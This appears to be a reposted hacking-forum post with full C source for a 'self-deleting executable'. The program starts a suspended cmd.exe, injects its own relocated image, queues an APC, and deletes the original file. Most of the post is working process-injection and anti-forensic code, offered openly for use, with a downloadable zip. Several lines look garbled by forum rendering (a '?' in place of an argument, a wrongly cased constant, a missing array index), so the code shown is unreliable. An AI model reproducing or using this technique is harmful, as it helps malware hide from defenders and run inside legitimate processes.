Self-deleting executable

[Nytro]

[h=1]Self-deleting executable[/h]by

[h=3]zwclose7[/h]This is another example of PE injection. This program will create a suspended cmd.exe process, and then inject the executable image into to the child process. An user mode APC is then queued to the child process's primary thread. Finally, the thread is resumed and the injected code is executed. The injected code calls DeleteFile function to delete the original executable file.

1) Get the PE header of the program using RtlImageNtHeader.

2) Create a suspended cmd.exe using CreateProcess function.

3) Allocate executable memory in the child process.

4) Relocate the executable image, and then write it to the child process using NtWriteVirtualMemory function.

5) Queue an user mode APC to the child process's primary thread.

6) Resume the primary thread using NtResumeThread function.

7) The primary thread executes the injected code.

8) The injected code calls DeleteFile function to delete the original executable file.

9) The injected code calls ExitProcess function to terminate the cmd.exe process.

#include <Windows.h>

#include <winternl.h>

#pragma comment(lib,"ntdll.lib")

EXTERN_C PIMAGE_NT_HEADERS NTAPI RtlImageNtHeader(PVOID);

EXTERN_C NTSTATUS NTAPI NtWriteVirtualMemory(HANDLE,PVOID,PVOID,ULONG,PULONG);

EXTERN_C NTSTATUS NTAPI NtResumeThread(HANDLE,PULONG);

EXTERN_C NTSTATUS NTAPI NtTerminateProcess(HANDLE,NTSTATUS);

char szFileName[260];

void WINAPI ThreadProc()

{

while(1)

{

Sleep(1000);

if(DeleteFile(szFileName))

{

break;

}

}

ExitProcess(0);

}

int WINAPI WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR lpCmdLine,int nCmdShow)

{

PIMAGE_NT_HEADERS pINH;

PIMAGE_DATA_DIRECTORY pIDD;

PIMAGE_BASE_RELOCATION pIBR;

HMODULE hModule;

PVOID image,mem,StartAddress;

DWORD i,count,nSizeOfImage;

DWORD_PTR delta,OldDelta;

LPWORD list;

PDWORD_PTR p;

STARTUPINFO si;

PROCESS_INFORMATION pi;

GetModuleFileName(NULL,szFileName,260);

hModule=GetModuleHandle(NULL);

pINH=RtlImageNtHeader(hModule);

nSizeOfImage=pINH->OptionalHeader.SizeOfImage;

memset(&si,0,sizeof(si));

memset(?,0,sizeof(pi));

if(!CreateProcess(NULL,"cmd.exe",NULL,NULL,FALSE,CREATE_SUSPENDED|CREATE_NO_WINDOW,NULL,NULL,&si,?))

{

return 1;

}

mem=VirtualAllocEx(pi.hProcess,NULL,nSizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

if(mem==NULL)

{

NtTerminateProcess(pi.hProcess,0);

return 1;

}

image=VirtualAlloc(NULL,nSizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

memcpy(image,hModule,nSizeOfImage);

pIDD=&pINH->OptionalHeader.DataDirectory[iMAGE_DIRECTORY_ENTRY_BASERELOC];

pIBR=(PIMAGE_BASE_RELOCATION)((LPBYTE)image+pIDD->VirtualAddress);

delta=(DWORD_PTR)((LPBYTE)mem-pINH->OptionalHeader.ImageBase);

OldDelta=(DWORD_PTR)((LPBYTE)hModule-pINH->OptionalHeader.ImageBase);

while(pIBR->VirtualAddress!=0)

{

if(pIBR->SizeOfBlock>=sizeof(IMAGE_BASE_RELOCATION))

{

count=(pIBR->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/sizeof(WORD);

list=(LPWORD)((LPBYTE)pIBR+sizeof(IMAGE_BASE_RELOCATION));

for(i=0;i<count;i++)

{

if(list>0)

{

p=(PDWORD_PTR)((LPBYTE)image+(pIBR->VirtualAddress+(0x0fff & (list))));

*p-=OldDelta;

*p+=delta;

}

}

}

pIBR=(PIMAGE_BASE_RELOCATION)((LPBYTE)pIBR+pIBR->SizeOfBlock);

}

if(!NT_SUCCESS(NtWriteVirtualMemory(pi.hProcess,mem,image,nSizeOfImage,NULL)))

{

NtTerminateProcess(pi.hProcess,0);

return 1;

}

StartAddress=(PVOID)((LPBYTE)mem+(DWORD_PTR)(LPBYTE)ThreadProc-(LPBYTE)hModule);

if(!QueueUserAPC((PAPCFUNC)StartAddress,pi.hThread,0))

{

NtTerminateProcess(pi.hProcess,0);

return 1;

}

NtResumeThread(pi.hThread,NULL);

NtClose(pi.hThread);

NtClose(pi.hProcess);

VirtualFree(image,0,MEM_RELEASE);

return 0;

}

[h=4]Attached Files[/h]

• selfdel.zip 272.35K 6 downloads
  

Sursa: Self-deleting executable - rohitab.com - Forums